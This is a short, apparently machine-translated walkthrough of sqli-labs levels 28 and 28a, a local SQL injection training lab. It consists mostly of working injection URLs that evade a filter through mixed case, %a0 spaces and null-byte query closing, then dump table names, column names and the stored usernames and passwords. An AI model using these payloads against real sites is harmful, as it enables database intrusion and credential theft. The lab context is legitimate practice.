sqli-labs (menos-28 y menos-28a)

sqli-labs (menos-28 y menos-28a)

menos-28

Ingrese el nivel 28, ingrese ID = 1 para

ver el código fuente. Se

encuentra que es básicamente el mismo que el nivel 27, aún usando mayúsculas y minúsculas para omitir

http://127.0.0.1/sql1/Less-28/?id=1' #回显错误
http://127.0.0.1/sql1/Less-28/?id=1');%00 #正常显示

Juzgue el modo de cierre como ');% 00, e inyecte el tipo de carácter para
determinar la posición del eco

http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,3;%00

Ver biblioteca actual

http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,database();%00

Ver todas las tablas en la biblioteca de seguridad

http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,(select (group_concat(table_name)) from (information_schema.tables) where (table_schema='security'));%00

Ver todos los campos debajo de la tabla de usuarios

http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,(select (group_concat(column_name)) from (information_schema.columns) where (table_name='users'));%00

Ver los valores de los campos de nombre de usuario y contraseña

http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,(select (group_concat(username,password)) from (security.users));%00

menos-28a

http://127.0.0.1/sql1/Less-28a/?id=1' #回显错误
http://127.0.0.1/sql1/Less-28a/?id=1');%00 #回显正常

Juzgue el método de cierre como ');% 00, e inyecte el tipo de carácter.
Lo siguiente no es específico, es exactamente lo mismo que less-28, esta pasada también usa mayúsculas y minúsculas para eludir el firewall waf